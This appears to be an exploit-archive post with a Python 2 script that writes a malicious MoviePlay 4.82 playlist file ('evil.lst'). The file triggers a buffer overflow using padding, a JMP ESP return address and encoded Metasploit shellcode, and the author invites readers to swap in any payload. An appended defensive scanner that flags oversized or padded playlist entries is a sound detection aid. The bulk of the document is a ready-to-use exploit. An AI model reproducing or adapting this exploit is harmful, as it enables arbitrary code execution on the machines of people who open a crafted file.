
MoviePlay 4.82 Buffer Overflow

Posted on 12 February 2011

#!/usr/bin/env python
# MoviePlay 4.82 (.lst) Buffer Overflow
# Author: sickness
# Download : http://www.softpedia.com/get/Multimedia/Video/Video-Players/MoviePlay.shtml
# Previous version exploit can be found here: http://www.exploit-db.com/exploits/4051/
# Tested : Windows XP Professional SP3 (EN) latest updates with IE8
# DATE : 10/02/2011
###################################################################
# You might need to change the EIP address
# The payload can be replaced with whatever you want, there is enough space.
###################################################################
# Note: Python 2 script (print statement, str used as raw bytes).

# Playlist header: "[MoviePlay]\r\nFileName0=C:\"
begin = "\x5b\x4d\x6f\x76\x69\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x30\x3d\x43\x3a\x5c"

junk = '\x90' * 1085        # padding up to the saved return address
eip = '\xD7\x30\x9D\x7C'    # JMP ESP SHELL32.dll
nops = '\x90'*16

# msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -t c
sc = ("\xbe\x41\x9e\x4e\xd0\x33\xc9\xda\xd7\xd9\x74\x24\xf4\xb1\x33"
"\x58\x31\x70\x10\x83\xe8\xfc\x03\x31\x92\xac\x25\x4d\x42\xb9"
"\xc6\xad\x93\xda\x4f\x48\xa2\xc8\x34\x19\x97\xdc\x3f\x4f\x14"
"\x96\x12\x7b\xaf\xda\xba\x8c\x18\x50\x9d\xa3\x99\x54\x21\x6f"
"\x59\xf6\xdd\x6d\x8e\xd8\xdc\xbe\xc3\x19\x18\xa2\x2c\x4b\xf1"
"\xa9\x9f\x7c\x76\xef\x23\x7c\x58\x64\x1b\x06\xdd\xba\xe8\xbc"
"\xdc\xea\x41\xca\x97\x12\xe9\x94\x07\x23\x3e\xc7\x74\x6a\x4b"
"\x3c\x0e\x6d\x9d\x0c\xef\x5c\xe1\xc3\xce\x51\xec\x1a\x16\x55"
"\x0f\x69\x6c\xa6\xb2\x6a\xb7\xd5\x68\xfe\x2a\x7d\xfa\x58\x8f"
"\x7c\x2f\x3e\x44\x72\x84\x34\x02\x96\x1b\x98\x38\xa2\x90\x1f"
"\xef\x23\xe2\x3b\x2b\x68\xb0\x22\x6a\xd4\x17\x5a\x6c\xb0\xc8"
"\xfe\xe6\x52\x1c\x78\xa5\x38\xe3\x08\xd3\x05\xe3\x12\xdc\x25"
"\x8c\x23\x57\xaa\xcb\xbb\xb2\x8f\x24\xf6\x9f\xb9\xac\x5f\x4a"
"\xf8\xb0\x5f\xa0\x3e\xcd\xe3\x41\xbe\x2a\xfb\x23\xbb\x77\xbb"
"\xd8\xb1\xe8\x2e\xdf\x66\x08\x7b\xbc\xe9\x9a\xe7\x6d\x8c\x1a"
"\x8d\x71")

exploit = junk + eip + nops + sc
rest = '\x90'*(2000-len(exploit))   # pad the FileName0 value to 2000 bytes

# Playlist trailer: ".mp3\r\nFileName1=\r\nNumFiles=1\r\n"
end="\x2e\x6d\x70\x33\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x31\x3d\x0d\x0a\x4e\x75\x6d\x46\x69\x6c\x65\x73\x3d\x31\x0d\x0a"

try:
    f = open("evil.lst","w");
    f.write(begin+exploit+rest+end)
    f.close()
    print "Done!"
except:
    print "Something went wrong!"
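
A defensive check for the kind of file this script writes, as an added example that is not part of the original post: it scans the raw bytes of a .lst playlist and flags FileNameN values that are oversized, contain control bytes, or carry a long run of one repeated byte like the padding above. The 260-byte limit (Windows MAX_PATH), the 16-byte run threshold, the case-insensitive key match and the reason labels are assumptions chosen for illustration.

```python
import re

MAX_PATH = 260  # assumption: Windows MAX_PATH as the longest legitimate entry
# 16 or more repeats of a single byte (padding or a sled); threshold is an assumption
RUN_RE = re.compile(rb"(.)\1{15,}", re.DOTALL)


def scan_lst(data):
    """Return sorted (key, reason) findings for the raw bytes of a .lst playlist."""
    findings = set()
    # Entries are separated by CRLF, as in the header and trailer strings above.
    for line in data.split(b"\r\n"):
        key, sep, value = line.partition(b"=")
        # Assumption: keys are matched case-insensitively by the player.
        if not sep or not key.strip().lower().startswith(b"filename"):
            continue
        name = key.strip().decode("ascii", "replace")
        if len(value) > MAX_PATH:
            findings.add((name, "too-long"))
        if any(b < 0x20 or b == 0x7F for b in value):
            findings.add((name, "control-bytes"))
        if RUN_RE.search(value):
            findings.add((name, "byte-run"))
    return sorted(findings)


# Constructed samples (no payload bytes): a normal playlist, an oversized
# entry padded with 0x90, and a short entry hiding a control byte.
BENIGN = (b"[MoviePlay]\r\nFileName0=C:\\music\\track01.mp3\r\n"
          b"FileName1=\r\nNumFiles=1\r\n")
OVERSIZED = (b"[MoviePlay]\r\nFileName0=C:\\" + b"\x90" * 2000 +
             b".mp3\r\nFileName1=\r\nNumFiles=1\r\n")
CONTROL = b"[MoviePlay]\r\nfilename0=C:\\a\x01b.mp3\r\nNumFiles=1\r\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED),
                          ("control", CONTROL)):
        print(label, scan_lst(sample))
```

Legitimate playlists with non-ASCII file names pass the control-byte check, since only bytes below 0x20 and 0x7F are flagged; the length check is what catches the 2000-byte value.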

 
